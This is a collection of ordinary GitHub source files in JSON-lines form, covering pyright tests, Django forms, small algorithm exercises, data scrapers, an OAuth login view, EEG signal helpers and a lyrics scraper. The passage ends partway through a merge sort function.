expected_text=\"A[str]\")\n\nb = B(Desc(), Desc(), Desc())\nreveal_type(b.x, expected_text=\"int\")\nreveal_type(b.y, expected_text=\"str\")\nreveal_type(b.z, expected_text=\"str\")\n\nc = C(Desc(), Desc(), Desc())\nreveal_type(c.x, expected_text=\"int\")\nreveal_type(c.y, expected_text=\"str\")\nreveal_type(c.z, expected_text=\"str\")\n","repo_name":"microsoft/pyright","sub_path":"packages/pyright-internal/src/tests/samples/dataclassDescriptors2.py","file_name":"dataclassDescriptors2.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":11208,"dataset":"github-code","pt":"48"} +{"seq_id":"74896172946","text":"\"\"\"\nGiven a binary tree, find its maximum depth.\n\nThe maximum depth is the number of nodes along the longest path from\n the root node down to the farthest leaf node.\n\n\"\"\"\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution(object):\n def maxDepth(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n def recurMethod(node):\n if node is None:\n return 0\n\n if node.right is None and node.left is None:\n return 1\n\n left, right = 0, 0\n\n if node.left is not None:\n left = recurMethod(node.left)\n\n if node.right is not None:\n right = recurMethod(node.right)\n\n return 1 + max(left, right)\n return recurMethod(root)\n","repo_name":"Faiz-zz-zz/interview_questions","sub_path":"max_depth_of_binary_tree.py","file_name":"max_depth_of_binary_tree.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"4380752179","text":"from machine import I2C\nfrom lib.devices.axp import AXP192\n\nclass Battery:\n def read(self):\n i2c = I2C(baudrate=400_000, pins=('G21','G22'))\n axp = AXP192(i2c)\n read = axp.batt_percentage()\n i2c.deinit()\n return read\n","repo_name":"PiniponSelvagem/Cybertruck-RC","sub_path":"microcontroller/python/cybertruck/battery.py","file_name":"battery.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74866423186","text":"#!/usr/bin/python3.8\n# -*- coding: utf-8 -*-\n# @Author: Mack\n# @Time: 2022/12/22 17:16 \n# @File: ex45.py\n# @Software: PyCharm\n\n\nfrom selenium import webdriver\n\nbrowser = webdriver.Firefox()\nbrowser.get('http://localhost:8000')\nassert 'Django' in browser.title\n","repo_name":"MackDing/practice-of-Rhythm","sub_path":"Python/Learn-Python3-The-Hard-Way/ex45.py","file_name":"ex45.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11607948426","text":"from django.forms.models import ModelForm\nfrom app.tickets.models import Ticket, TicketUpdate, TicketType\nfrom django import forms\nfrom django.utils.translation import ugettext as _\n\n\nclass ClientTicketForm(ModelForm):\n \"\"\"\n Form for making comments\n \"\"\"\n comment = forms.CharField(widget=forms.Textarea, label=_(\"Add Comment\"))\n attach = forms.FileField(label=_(\"Add Attachment\"), required=False)\n\n class Meta:\n model = Ticket\n fields = ()\n\n\n def save(self, *args, **kwargs):\n ticket = super(ClientTicketForm, self).save()\n ticketupdate = TicketUpdate.objects.create(ticket=ticket,\n comment=self.cleaned_data['comment'],\n attachment=self.cleaned_data['attach'])\n\n return 
ticketupdate\n\n\nclass ClientNewTicketForm(ModelForm):\n    \"\"\" Form for creating new tickets \"\"\"\n\n    client = None\n\n    class Meta:\n        model = Ticket\n        fields = ('title', 'description', 'company')\n\n\n    def __init__(self, client, *args, **kwargs):\n        super(ClientNewTicketForm, self).__init__(*args, **kwargs)\n        self.client = client\n        self.fields['company'].queryset = client.get_related_companys()\n        self.fields['company'].empty_label = None\n\n    def save(self, commit=True):\n        ticket = super(ClientNewTicketForm, self).save(commit=False)\n        ticket.client_user = self.client\n        ticket.type = TicketType.objects.get_or_create(name=_(\"Client ticket\"),\n                                                       company=self.cleaned_data['company'],\n                                                       description=_(\"Submitted by a client\"))[0]\n        # Model.save() takes no 'commit' argument; only persist and link when commit is True\n        if commit:\n            ticket.save()\n            self.client.tickets.add(ticket)\n\n        return ticket\n","repo_name":"frecar/focus","sub_path":"project/app/client/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
{"seq_id":"44861897816","text":"import pygame\n\nclass Button():\n\t\"\"\"\n\tThis function is used to initialize the button\n\n\tParameters:\n\t\t\tsurface (pygame.Surface): The surface of the button\n\t\t\tx (int): The x position of the button\n\t\t\ty (int): The y position of the button\n\t\t\timage (pygame.Surface): The image of the button\n\t\t\tsize_x (int): The size of the button in x axis\n\t\t\tsize_y (int): The size of the button in y axis\n\t\t\tname (str): The name of the button\n\t\t\tdescription (str): The description of the button. Default is empty string\n\n \tReturns:\n\t\t\tNone\n\t\"\"\"\n\tdef __init__(self, surface, x, y, image, size_x, size_y, name, description=''):\n\t\tself.image = pygame.transform.scale(image, (size_x, size_y))\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.topleft = (x, y)\n\t\tself.clicked = False\n\t\tself.surface = surface\n\t\tself.name = name\n\t\tself.description = description\n\n\tdef draw(self):\n\t\t\"\"\"\n\t\tThis function is used to draw the button\n\n\t\tParameters:\n\t\t\t\tNone\n\n\t\tReturns:\n\t\t\t\taction (bool): The action of the button\n\t\t\"\"\"\n\t\taction = False\n\n\t\tpos = pygame.mouse.get_pos()\n\n\t\tif self.rect.collidepoint(pos):\n\t\t\tif pygame.mouse.get_pressed()[0] == 1 and self.clicked == False:\n\t\t\t\taction = True\n\t\t\t\tself.clicked = True\n\n\t\tif pygame.mouse.get_pressed()[0] == 0:\n\t\t\tself.clicked = False\n\n\t\tself.surface.blit(self.image, (self.rect.x, self.rect.y))\n\n\t\treturn action","repo_name":"zyx-0314/Turn-Based-Rogue-Game","sub_path":"components/buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"69891533587","text":"from django.urls import path\nfrom . 
import views\n\napp_name = 'store'\n\nurlpatterns = [\n path('', views.home, name = \"store-home\"),\n path('about/', views.about, name = \"store-about\"),\n path('book/', views.book, name = \"store-book\"),\n path('register/', views.user_register, name='user_register'), # maybe change\n path('login/', views.user_login, name='user_login'),\n path('logout/', views.user_logout, name='user_logout'),\n path('rentals/', views.user_rentals, name='user_rentals'),\n path('returns/', views.user_returns, name='user_returns'),\n\n\n\n]\n","repo_name":"AreebRoyepen/Video-Store-Management-System","sub_path":"store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"34339118084","text":"import itertools\n\n# logo script to walk the spiral\ndef gen_logo():\n\tfor n in itertools.count():\n\t\tfor n in range(n+1):\n\t\t\tyield('F')\n\t\tyield('L')\n\t\tfor n in range(n+1):\n\t\t\tyield('F')\n\t\tyield('L')\n\nprint(''.join(itertools.islice(gen_logo(), 100))) # grab the first five elements\n\n# logo turtle interpreter, returns (n,x,y) each square visited\nrotL = {'N': 'W', 'S': 'E', 'E':'N', 'W': 'S' }\nmove = {'N': (0,1), 'S':(0,-1), 'E':(1,0), 'W':(-1,0)} # (x,y)\ndef gene():\n\tx,y,n = 0,0,0\n\tdirection = 'E'\n\tfor cmd in gen_logo():\n\t\tif cmd == 'L':\n\t\t\tdirection = rotL[direction]\n\t\telif cmd == 'F':\n\t\t\txd, yd = move[direction]\n\t\t\tn = n + 1\n\t\t\tyield( (n, x, y) )\n\t\t\tx = x + xd\n\t\t\ty = y + yd\n\nprint(list(itertools.islice(gene(), 26)))\n\ndef walk(steps):\n\tfor n, x, y in gene():\n\t\tif n == steps:\n\t\t\treturn abs(x) + abs(y)\n\ndef check(steps, e):\n\tprint('{} == {}'.format(walk(steps), e))\n\ncheck(1, 0) #1 is carried 0 steps, since it's at the access port.\ncheck(12, 3) #Data from square 12 is carried 3 steps, such as: down, left, left.\ncheck(23, 2) #Data from square 23 is carried only 2 steps: up twice.\ncheck(1024, 31) #Data from square 1024 must be carried 31 steps.\n\nprint(walk(289326))\n\n# part 2 \n# each position in the spiral has an associated value, which is assigned once\n# based ont he sum of the neigbouring 9 squares, or zero if not assigned at that time\n\ndef neighbours(x,y):\n\tyield (x,y+1)\n\tyield (x,y-1)\n\tyield (x+1,y)\n\tyield (x-1,y)\n\tyield (x+1,y+1)\n\tyield (x-1,y+1)\n\tyield (x+1,y-1)\n\tyield (x-1,y-1)\n\ndef gene2():\n\tsaved_values = {}\n\taround = 1\n\tfor n,x,y in gene():\n\t\tif n > 1:\n\t\t\taround = sum([ saved_values.get( (nx, ny), 0) for (nx,ny) in neighbours(x,y) ])\n\t\tsaved_values[ (x,y) ] = around\n\t\tyield(around)\n\nprint(list(itertools.islice(gene2(), 26)))\n\nfor x in gene2():\n\tif x > 289326:\n\t\tprint(x)\n\t\tbreak\n\n","repo_name":"shuckc/adventofcode","sub_path":"2017/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"36621228005","text":"import os\nimport sys\n\nfrom from_root import from_root\n\np = from_root('CONTRIBUTING.md').parent\nsys.path.insert(1, str(p))\n\nfrom scrapers_library.data_portals.opendata.opendata_scraper_2 import \\\n opendata_scraper2\n\nsave_url = [\n [\"crime_data/2020-present/\", \"https://data.lacity.org/resource/2nrs-mtv8.csv\"],\n [\n \"vehicle_ped_stop/2010-present/\",\n \"https://data.lacity.org/resource/ci25-wgt7.csv\",\n ],\n [\"arrests/2020-present/\", \"https://data.lacity.org/resource/amvf-fr72.csv\"],\n 
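# each entry pairs an output subfolder with a Socrata CSV endpoint on data.lacity.org\n    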
[\"response_metrics/citywide/\", \"https://data.lacity.org/resource/kcsj-s69p.csv\"],\n [\"cfs/2021/\", \"https://data.lacity.org/resource/cibt-wiru.csv\"],\n]\n\nsave_folder = \"./data/\"\n\n# Optional argument `save_subfolder` allows saving in a subfolder\n# Optional argument `sleep_time` should be set to the site's crawl-delay,\n# which can be found in their robots.txt file_name, default time is 1\nopendata_scraper2(save_url, save_folder, sleep_time=1, save_subfolder=True)\n","repo_name":"Police-Data-Accessibility-Project/scrapers","sub_path":"scrapers_library/CA/los_angeles_county/los_angeles/los_angeles_police/la_opendata.py","file_name":"la_opendata.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"48"} +{"seq_id":"7540703244","text":"import requests\r\nfrom time import time\r\nimport re\r\n\r\ndef base36encode(number, alphabet='0123456789abcdefghijklmnopqrstuvwxyz'):\r\n \"\"\"Source: Stack Overflow\"\"\"\r\n if not isinstance(number, int):\r\n raise TypeError('number must be an integer')\r\n base36 = ''\r\n sign = ''\r\n if number < 0:\r\n sign = '-'\r\n number = -number\r\n if 0 <= number < len(alphabet):\r\n return sign + alphabet[number]\r\n while number != 0:\r\n number, i = divmod(number, len(alphabet))\r\n base36 = alphabet[i] + base36\r\n return sign + base36\r\n\r\ndef getRequest(url):\r\n responseSuccess = False\r\n while responseSuccess == False:\r\n request = requests.get(url)\r\n print(request)\r\n if repr(request) == '': # Success\r\n responseSuccess = True\r\n json_response = request.json()\r\n else: # Failed, probably timed out or smth\r\n print('Retrying...')\r\n return json_response\r\n\r\nclass Interact:\r\n def __init__(self, interactId, interactType, rp):\r\n self.interactId = interactId\r\n self.interactType = interactType\r\n self.rp = rp\r\n\r\n# first one for profile calls, second one for attacks\r\nreg = ['[🥇🥈🥉🏅] Rank: ([ABCDESX]+) \\(-?((\\d+,\\d+)|\\d+) Rank Points\\)', '🏅 [+-](.\\d+) RP']\r\n\r\nwith open('rp.txt', 'w') as f:\r\n before = round(time()) # Start searching from current time\r\n calls = 0 # number of calls\r\n players = {} # dict of players\r\n seasonStart = 1675278000 # 19:00 Feb 1 2023 GMT\r\n searching = True\r\n\r\n while searching:\r\n interactString = ''\r\n interactList = {}\r\n url = f\"https://api.pushshift.io/reddit/search/comment/?author=KickOpenTheDoorBot&before={before}&size=500\"\r\n\r\n # Getting bot comments\r\n json_response = getRequest(url)\r\n\r\n # Processing all bot comments \r\n for comment in json_response['data']:\r\n if comment['stickied'] == True: pass\r\n if before <= seasonStart:\r\n searching = False\r\n break\r\n try:\r\n interactString += f\"{base36encode(comment['parent_id'])},\"\r\n if 'Rank:' in comment['body']: # profile call\r\n rp = int(re.search(reg[0], comment['body']).group().split(' ')[3].replace('(', '').replace(',', '')) # get RP in profile call\r\n interactList.update({base36encode(comment['parent_id']): Interact(comment['id'], 'profile', rp)})\r\n elif 'Damage Breakdown' in comment['body']: # attack\r\n rp = int(re.search(reg[1], comment['body']).group().split(' ')[1].replace('+', '')) # get gained RP in attack\r\n interactList.update({base36encode(comment['parent_id']): Interact(comment['id'], 'attack', rp)})\r\n else: # something else\r\n interactList.update({base36encode(comment['parent_id']): Interact(comment['id'], 'other', 0)})\r\n except TypeError: pass\r\n before = comment['created_utc']\r\n 
beforestamp = comment['utc_datetime_str']\r\n\r\n # Getting player interacts from bot comments\r\n url = f\"https://api.pushshift.io/reddit/search/comment/?ids={interactString[:-1]}&size=500\"\r\n json_response = getRequest(url)\r\n\r\n # Processing player interacts\r\n # Every player gets an entry in the players variable. Key is player name, value is array of every interact they've made\r\n for comment in json_response['data']:\r\n interactHistory = players.get(comment['author'], [])\r\n interactHistory.append(interactList[comment['id']])\r\n newdict = {comment['author']: interactHistory}\r\n players.update(newdict)\r\n\r\n # Progress check\r\n calls += 1\r\n print(f'{calls} calls done, currently searching {beforestamp}')\r\n\r\n for player in players:\r\n interactHistory = players.get(player)\r\n \r\n # Finding most recent profile call\r\n lastProfile = len(interactHistory) - 1\r\n for index, value in enumerate(interactHistory):\r\n if value.interactType == 'profile':\r\n lastProfile = index\r\n break\r\n\r\n # Summing up gained RP since most recent profile\r\n rp = 0\r\n for i in range(lastProfile + 1):\r\n rp += interactHistory[i].rp\r\n\r\n # Writing result to file \r\n f.write(f'{player}, {rp}\\n')\r\n","repo_name":"thedoorgoesboom/kotd-rp-tracker","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21225551154","text":"from django.shortcuts import render,redirect\nfrom oauth_backend import OauthBackend\nfrom django.http import HttpResponse, HttpResponseForbidden\nfrom django.http import Http404\nfrom django.utils.crypto import get_random_string\nfrom django.conf import settings\nfrom django.contrib.auth import authenticate, login\nfrom tukey.models import UnregisteredUser\nimport urllib,json,requests\nfrom openstack_auth.exceptions import KeystoneAuthException\nbackend=OauthBackend()\n\n\n\ndef index(request):\n '''\n Login entry for google oauth2.0, an antiforgery token is created \n and user is redirected to google oauth endpoint\n '''\n state=get_random_string(length=32)\n parameters=settings.OAUTH['parameters'].copy()\n parameters['state']=state\n request.session['oauth_state']=state\n request.session['next']=request.GET.get('next','/project')\n return redirect(settings.OAUTH['auth_uri']+\"?\"+\\\n urllib.urlencode(parameters))\n\n\ndef oauth2callback(request):\n '''\n Endpoint for google oauth2.0 callback, the antiforgery token is checked,\n then tukey talk to google using the code in the request, and exchange user\n information from google, user email is extracted from id_token\n '''\n if request.session.get('oauth_state','')==request.GET['state']:\n token=backend.getToken(request.GET.get('code',''))\n if token.has_key('id_token'):\n email=backend.decode(token['id_token'])\n else:\n return render(request,'403.html',{},status=403)\n try:\n user=authenticate(password=settings.TUKEY_PASSWORD,username='openid %s' % email,\\\n auth_url=settings.OPENSTACK_KEYSTONE_URL,request=request)\n user.identifier=email\n if user!=None and user.is_active:\n login(request,user)\n return redirect(request.session.get('next','/project'))\n \n #create unregistered user if user is not authorized in keystone,\n #and redirect user to apply page\n except KeystoneAuthException:\n user=UnregisteredUser('OpenId',email)\n from tukey.webforms.views import osdc_apply\n return osdc_apply(request, user)\n\n else:\n return 
render(request,'403.html',{},status=403)\n\n\n","repo_name":"Li-Ko/tukey_portal","sub_path":"tukey/oauth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41518994544","text":"import hashlib\n\n\ndef encrypt_str(word):\n \"\"\"\n The function takes a string and returns an hashtext using SHA-2 encryption algorithm\n \"\"\"\n result = hashlib.sha256(word.encode())\n print(result.hexdigest())\n\n\nencrypt_str(word=\"With a method like this\")\n","repo_name":"thepsalmist/internitel","sub_path":"qn3/sha-2.py","file_name":"sha-2.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71897547345","text":"# Matrix multiplication\n# Write two functions that each multiply two square matrices,\n# one without using the built-in numpy functions and the other - using numpy.\n# The first problem is inputted with lists of size, each with size elements.\n# The second task is fed with objects of type np.ndarray --- square matrices of the same size.\n\n# The first function should return a list of lists and the second function should return np.array.\n\nfrom typing import List\nimport numpy as np\n\ndef no_numpy_mult(first, second):\n \"\"\"\n param first: list of \"size\" lists, each contains \"size\" floats\n param second: list of \"size\" lists, each contains \"size\" floats\n \"\"\"\n # Find the length of the first list (the height of the matrix)\n new_matrix_rows = len(first)\n\n # Find the length of the first element of the second list (the width of the matrix)\n new_matrix_columns = len(second[0])\n\n new_matrix = [[0 for _ in range(new_matrix_columns)] for _ in range(new_matrix_rows)]\n\n for i in range(new_matrix_rows):\n for j in range(new_matrix_columns):\n current_cell_sum_cumulative = 0\n for r in range(len(second)):\n current_cell_sum_cumulative += first[i][r] * second[r][j]\n\n new_matrix[i][j] = current_cell_sum_cumulative\n\n\n return new_matrix\n\ndef numpy_mult(first, second):\n \"\"\"\n param first: np.array[size, size]\n param second: np.array[size, size]\n \"\"\"\n\n #YOUR CODE: please use numpy\n\n result = np.matmul(first, second)\n return result\n\n\na = no_numpy_mult([[2, -3, 1], [5, 4, -2]], [[-7, 5], [2, -1], [4, 3]])\nprint(a)\n\nb = numpy_mult(np.array([[2, -3, 1], [5, 4, -2]]), np.array([[-7, 5], [2, -1], [4, 3]]))\nprint(b)\n\n# [[-16 16]\n# [-35 15]]\n","repo_name":"ArkadiyShuvaev/StepikDeepLearningBaseCourse","sub_path":"3. numpy/exercises/6.1.6 mutrix-multiplication.py","file_name":"6.1.6 mutrix-multiplication.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30133305775","text":"############################################################################JEJUS############################\r\n# [O2U.py] #\r\n# #\r\n# Function : \"O2U.py\" is a header file for EEG signal processing in \"Python Scripting\" Box. #\r\n# There exist the basic methods which are used in a main script for the signal processing. #\r\n# You can try to process the EEG signal in the various ways by adding a method that you want #\r\n# to use in this header file. 
#\r\n# #\r\n# --------------------------------------------------------------------------------------------------------- #\r\n# #\r\n# Author: # \r\n# Seongjoon Jeong (jdd01299@naver.com) #\r\n# Brain-Computer Interface (BCI) Lab. #\r\n# School of Computer Science and Electrical Engineering, #\r\n# Handong Global University, Pohang, Korea #\r\n# #\r\n# #\r\n# Histroy: (1.0) 2018.12.08 by Seongjoon Jeong #\r\n# #\r\n#############################################################################################################\r\n\r\nimport numpy\r\nimport math\r\n\r\n\r\n### The Methods for Signal Processing ###\r\n\r\n\r\n# 1. stimInputCheck(...) ( Output : result{=bool} )\r\n# : To check that the interested stimulation's input is coming in.\r\ndef stimInputCheck(input, OVStimulationSet, index, identifier): \r\n result = False\r\n for chunkIndex in range( len(input[index]) ):\r\n chunk = input[index].pop()\r\n if(type(chunk) == OVStimulationSet):\r\n for stimIdx in range(len(chunk)):\r\n stim=chunk.pop();\r\n # print('Received stim: ', stim.identifier, 'stamped at', stim.date, 's')\r\n if(stim.identifier == identifier):\r\n result = True\r\n \r\n return result\r\n\r\n\r\n\r\n# 2. readClassifierTxt(...) ( Output : classifier[1*numOfClass] )\r\n# : To read a classifier from a text file which is generated during the training time.\r\ndef readClassifierTxt(filename):\r\n f = open(filename)\r\n lines = f.readlines()\r\n classifier = lines[len(lines)-1]\r\n classifier = classifier[1:len(classifier)-2]\r\n classifier = classifier.split(', ')\r\n classifier = map(float, classifier)\r\n f.close()\r\n \r\n return classifier\r\n\r\n\r\n\r\n# 3. returnMeanOfAll(...) ( Output : mean{=float} )\r\n# : To retrun a mean of the raw data in all chennels.\r\ndef returnMeanOfAll(rawData, dimensionSizes): # rawData = 1D array [1 * signals] \r\n rawData2D = numpy.array(rawData).reshape(tuple(dimensionSizes)) # rawData2D = 2D array [channels * signals]\r\n rawData2D = rawData2D.mean(axis=0) # rawData2D = 2D array [channels * 1] (Only one value per channel)\r\n mean = (numpy.mean(rawData2D)) # mean = float [1*1]\r\n return mean\r\n\r\n\r\n\r\n# 4. makeDevClassifierTxt(...) ( Output : classifier[1*numOfClass] )\r\n# : To make a text file that has a classifier, which is generated by using an array of means and its standard deviation,\r\n# or return the classifier.\r\ndef makeDevClassifierTxt(meanArr, filename, numOfClass):\r\n lines =[]\r\n classifier = [0] * numOfClass\r\n \r\n f = open(filename, 'w')\r\n lines.append('---meanArr ( len=' + str(len(meanArr)) + ' )---\\n')\r\n lines.append(str(meanArr) + '\\n')\r\n \r\n N=len(meanArr)\r\n sumM=0 \r\n sumV=0\r\n\r\n # Average\r\n for i in range(0,N):\r\n sumM += meanArr[i]\r\n avg = sumM/N\r\n \r\n # Variance\r\n for i in range(0,N):\r\n sumV += math.pow(meanArr[i]-avg, 2)\r\n myVar = sumV/(N-1)\r\n \r\n # Deviation\r\n myDev = math.sqrt(myVar)\r\n lines.append('- Average: ' + str(avg) + '\\n')\r\n lines.append('- Variance: ' + str(myVar) + '\\n')\r\n lines.append('- Deviation: ' + str(myDev) + '\\n')\r\n \r\n # To make the classifier based uisng the deviation. \r\n # If you want to change the interval of the classifiers, you can change it by editting this follow part.\r\n for i in range(len(classifier)):\r\n classifier[i] = avg + (myDev * (-0.4 + (i * 0.4))) \r\n\r\n lines.append('---Classifier ( ' + str(numOfClass) + 'classes)---\\n')\r\n lines.append(str(classifier) + '\\n')\r\n f.writelines(lines)\r\n f.close()\r\n \r\n return classifier\r\n\r\n\r\n\r\n# 5. 
determineClass(...) ( Output : classNum{=Int} )\r\n# : To determine a class among N+1 classes.\r\ndef determineClass(classifier, mean):\r\n for i in range(len(classifier)-1):\r\n if classifier[i] <= mean < classifier[i+1]: # Among 1 ~ N-1\r\n classNum = i+1\r\n if classifier[0] > mean:\r\n classNum = 0 # Default state, 0\r\n if classifier[len(classifier)-1] <= mean:\r\n classNum = len(classifier) # Maximum state, N\r\n\r\n return classNum\r\n\r\n\r\n\r\n# 6. applyWindowSize(...) ( Output : previousMeansArr[1*?], mean{=float} )\r\n# : To apply the fixed window size.\r\ndef applyWindowSize(previousMeansArr, mean):\r\n # Update the 'previousMeansArr' using a current mean.\r\n previousMeansArr.pop()\r\n previousMeansArr.insert(0, mean)\r\n \r\n # Also, compute a new mean using the array for the fixed window size.\r\n mean = sum(previousMeansArr)/len(previousMeansArr)\r\n\r\n return previousMeansArr, mean\r\n\r\n# 7. readConfigFile(...) ( Output : classifier[1*numOfClass] )\r\n# : To read a classifier from a text file which is generated during the training time.\r\ndef readConfigFile(filename):\r\n f = open(filename)\r\n while True:\r\n line = f.readline()\r\n if not line: break\r\n\r\n if line[0] == 'O':\r\n tokens = line.split(' ')\r\n tokens[1] = tokens[1][0:len(tokens[1])-1]\r\n if tokens[0] == 'O2U_FILE_NAME':\r\n filename = tokens[1]\r\n elif tokens[0] == 'O2U_TRAINING_TIME':\r\n trainingTime = int(tokens[1])\r\n elif tokens[0] == 'O2U_ClASS_NUMBER':\r\n classNum = int(tokens[1]) \r\n \r\n f.close()\r\n\r\n return filename, trainingTime, classNum\r\n","repo_name":"AhnBCILab/Openvibe2Unity","sub_path":"Openvibe Settings/Python example scripts/Lib/O2U.py","file_name":"O2U.py","file_ext":"py","file_size_in_byte":7259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"37654379066","text":"#-*- coding: UTF-8 -*-\n'''\nScraper for http://newlyrics.gomtv.com/\n\nedge\n'''\n\nimport sys\nimport hashlib\nimport requests\nimport urllib.parse\nimport re\nimport unicodedata\nfrom lib.utils import *\nfrom lib.audiofile import AudioFile\n\n__title__ = 'GomAudio'\n__priority__ = '110'\n__lrc__ = True\n\n\nGOM_URL = 'http://newlyrics.gomtv.com/cgi-bin/lyrics.cgi?cmd=find_get_lyrics&file_key=%s&title=%s&artist=%s&from=gomaudio_local'\n\ndef remove_accents(data):\n nfkd_data = unicodedata.normalize('NFKD', data)\n return u\"\".join([c for c in nfkd_data if not unicodedata.combining(c)])\n\n\nclass gomClient(object):\n '''\n privide Gom specific function, such as key from mp3\n '''\n @staticmethod\n def GetKeyFromFile(file):\n musf = AudioFile()\n musf.Open(file)\n buf = musf.ReadAudioStream(100*1024)\t# 100KB from audio data\n musf.Close()\n # buffer will be empty for streaming audio\n if not buf:\n return\n # calculate hashkey\n m = hashlib.md5()\n m.update(buf)\n return m.hexdigest()\n\n @staticmethod\n def mSecConv(msec):\n s,ms = divmod(msec/10,100)\n m,s = divmod(s,60)\n return m,s,ms\n\nclass LyricsFetcher:\n def __init__(self, *args, **kwargs):\n self.DEBUG = kwargs['debug']\n self.settings = kwargs['settings']\n self.base_url = 'http://newlyrics.gomtv.com/'\n\n def get_lyrics(self, song, key=None, ext=None):\n log('%s: searching lyrics for %s - %s' % (__title__, song.artist, song.title), debug=self.DEBUG)\n lyrics = Lyrics(settings=self.settings)\n lyrics.song = song\n lyrics.source = __title__\n lyrics.lrc = __lrc__\n try:\n if not ext:\n ext = os.path.splitext(song.filepath)[1].lower()\n sup_ext = ['.mp3', '.ogg', '.wma', '.flac', 
'.ape', '.wav']\n if ext in sup_ext and key == None:\n key = gomClient.GetKeyFromFile(song.filepath)\n if not key:\n return None\n url = GOM_URL %(key, urllib.parse.quote(remove_accents(song.title).encode('euc-kr')), urllib.parse.quote(remove_accents(song.artist).encode('euc-kr')))\n response = requests.get(url, timeout=10)\n response.encoding = 'euc-kr'\n Page = response.text\n except:\n log('%s: %s::%s (%d) [%s]' % (\n __title__, self.__class__.__name__,\n sys.exc_info()[2].tb_frame.f_code.co_name,\n sys.exc_info()[2].tb_lineno,\n sys.exc_info()[1]\n ), debug=self.DEBUG)\n return None\n if Page[:Page.find('>')+1] != '':\n return None\n syncs = re.compile('([^<]*)').findall(Page)\n lyrline = []\n lyrline.append('[ti:%s]' %song.title)\n lyrline.append('[ar:%s]' %song.artist)\n for sync in syncs:\n # timeformat conversion\n t = '%02d:%02d.%02d' % gomClient.mSecConv(int(sync[0]))\n # unescape string\n try:\n s = sync[1].replace(''',\"'\").replace('"','\"')\n lyrline.append('[%s]%s' %(t,s))\n except:\n pass\n lyrics.lyrics = '\\n'.join(lyrline)\n return lyrics\n","repo_name":"nebulous42069/diggz","sub_path":"nexus/script.cu.lrclyrics/lib/broken-scrapers/gomaudio/lyricsScraper.py","file_name":"lyricsScraper.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"16825633679","text":"import json\nfrom typing import Any, Dict, Optional, cast\n\nfrom httpx import Headers, Response\n\nMAX_CONTENT = 200\n\n\nclass ApiException(Exception):\n \"\"\"Base class\"\"\"\n\n\nclass UnexpectedResponse(ApiException):\n def __init__(self, status_code: Optional[int], reason_phrase: str, content: bytes, headers: Headers) -> None:\n self.status_code = status_code\n self.reason_phrase = reason_phrase\n self.content = content\n self.headers = headers\n\n @staticmethod\n def for_response(response: Response) -> \"ApiException\":\n return UnexpectedResponse(\n status_code=response.status_code,\n reason_phrase=response.reason_phrase,\n content=response.content,\n headers=response.headers,\n )\n\n def __str__(self) -> str:\n status_code_str = f\"{self.status_code}\" if self.status_code is not None else \"\"\n if self.reason_phrase == \"\" and self.status_code is not None:\n reason_phrase_str = \"(Unrecognized Status Code)\"\n else:\n reason_phrase_str = f\"({self.reason_phrase})\"\n status_str = f\"{status_code_str} {reason_phrase_str}\".strip()\n short_content = self.content if len(self.content) <= MAX_CONTENT else self.content[: MAX_CONTENT - 3] + b\" ...\"\n raw_content_str = f\"Raw response content:\\n{short_content!r}\"\n return f\"Unexpected Response: {status_str}\\n{raw_content_str}\"\n\n def structured(self) -> Dict[str, Any]:\n return cast(Dict[str, Any], json.loads(self.content))\n\n\nclass ResponseHandlingException(ApiException):\n def __init__(self, source: Exception):\n self.source = source\n","repo_name":"kdeyev/SeisSpark","sub_path":"src/seisspark_client/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"1424148970","text":"def merge_sort(arr):\n\n n = len(arr)\n print(f'Merge sorting {arr}')\n if n > 1:\n\n mid = n // 2\n\n left = arr[:mid]\n right = arr[mid:]\n \n print(f'Breaking apart into {left} and {right}')\n\n merge_sort(left)\n merge_sort(right)\n\n i = 0\n j = 0\n k = 0\n\n while i < len(left) and j < len(right):\n\n if left[i] <= right[j]:\n arr[k] = 
